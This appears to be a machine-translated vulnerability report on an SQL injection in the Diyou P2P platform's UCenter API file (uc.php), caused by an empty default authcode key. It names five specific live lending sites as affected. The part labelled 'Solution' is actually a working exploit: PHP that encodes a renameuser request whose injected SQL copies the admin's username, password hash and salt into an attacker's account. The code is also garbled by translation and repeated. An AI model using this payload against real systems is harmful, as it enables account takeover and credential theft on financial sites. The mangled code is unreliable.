Diyou P2P stock-taking system file design defects can be injected (arbitrary login/password change)
Such as question
Modules \ ucenter \ api \ uc. php appears on the uc interface file
Error_reporting (7); define ('uc _ CLIENT_ROOT ', DISCUZ_ROOT. '. /client/'); chdir ('.. /'); require_once '. /config. inc. php '; $ code = $ _ GET ['code']; parse_str (authcode ($ code, 'decode', UC_KEY), $ get); if (MAGIC_QUOTES_GPC) {$ get = dstripslashes ($ get);} does not judge whether uc is switched
if(MAGIC_QUOTES_GPC) {$get = dstripslashes($get)
The gpc is removed here.
Function authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0) {$ ckey_length = 4; $ key = md5 ($ key? $ Key: UC_KEY); $ keya = md5 (substr ($ key, 0, 16); $ keyb = md5 (substr ($ key, 16, 16 )); $ keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length): ''; $ cryptkey = $ keya. md5 ($ keya. $ keyc); $ key_length = strlen ($ cryptkey); $ string = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0 ). substr (md5 ($ string. $ keyb), 0, 16 ). $ string; $ string_length = strlen ($ strin's built-in encryption function. The key is empty by default, which causes injection.
Elseif ($ action = 'renameuser '){! API_RENAMEUSER & exit (API_RETURN_FORBIDDEN); // API interface for renaming a user $ uid = $ get ['uid']; $ usernamenew = $ get ['newusername']; $ db-> query ("UPDATE {$ tablepre} members SET username = '$ usernamenew' WHERE uid = '$ uid'"); exit (API_RETURN_SUCCEED );
Anywhere
Yes
Case:
www.jinmaoweidai.com www.herunwang.com syziben.com www.lcbang.cn www.cheyidai88.com
Modules \ ucenter \ api \ uc. php appears on the uc interface file
error_reporting(7);define('UC_CLIENT_ROOT', DISCUZ_ROOT.'./client/');chdir('../');require_once './config.inc.php';$code = $_GET['code'];parse_str(authcode($code, 'DECODE', UC_KEY), $get);if(MAGIC_QUOTES_GPC) {$get = dstripslashes($get);}
No judge whether uc is switched
And
if(MAGIC_QUOTES_GPC) {$get = dstripslashes($get)
The gpc is removed here.
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {$ckey_length = 4;$key = md5($key ? $key : UC_KEY);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($strin
Built-in encryption function. The key is empty by default.
Therefore, the injection
Elseif ($ action = 'renameuser '){! API_RENAMEUSER & exit (API_RETURN_FORBIDDEN); // API interface for renaming a user $ uid = $ get ['uid']; $ usernamenew = $ get ['newusername']; $ db-> query ("UPDATE {$ tablepre} members SET username = '$ usernamenew' WHERE uid = '$ uid'"); exit (API_RETURN_SUCCEED );
Anywhere
Yes
Case:
www.jinmaoweidai.com www.herunwang.com syziben.com www.lcbang.cn www.cheyidai88.com
Solution:
$ _ G ['time'] = time () + 10*36000; $ _ G ['action'] = 'renameuser '; $ _ G ['newusername'] = "xser ', email = (select row from (select concat (userid, 0x7c, username, 0x7c, PASSWORD, 0x7c, salt) row from # table_member WHERE userid = 1 limit 0, 1) X1) where username = 'xser '# "; // update data to your account. $ Code = urlencode (_ authcode (http_build_query ($ _ G), 'encoding'); echo $ code; function authcode ($ string, $ operation = 'decode ', $ key = '', $ expiry = 0) {$ ckey_length = 4; $ key = md5 ($ key? $ Key: UC_KEY); $ keya = md5 (substr ($ key, 0, 16); $ keyb = md5 (substr ($ key, 16, 16 )); $ keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length): ''; $ cryptkey = $ keya. md5 ($ keya. $ keyc); $ key_length = strlen ($ cryptkey); $ string = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0 ). substr (md5 ($ string. $ keyb), 0, 16 ). $ string; $ string_length = strlen ($ string); $ result = ''; $ box = range (0,255); $ rndkey = array (); for ($ I = 0; $ I <= 255; $ I ++) {$ rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);} for ($ j = $ I = 0; I I <256; $ I ++) {$ j = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256; $ tmp = $ box [$ I]; $ box [$ I] = $ box [$ j]; $ box [$ j] = $ tmp;} for ($ a = $ j = $ I = 0; $ I <$ string_length; $ I ++) {$ A = ($ a + 1) % 256; $ j = ($ j + $ box [$ a]) % 256; $ tmp = $ box [$ a]; $ box [$ a] = $ box [$ j]; $ box [$ j] = $ tmp; $ result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]) ;}?>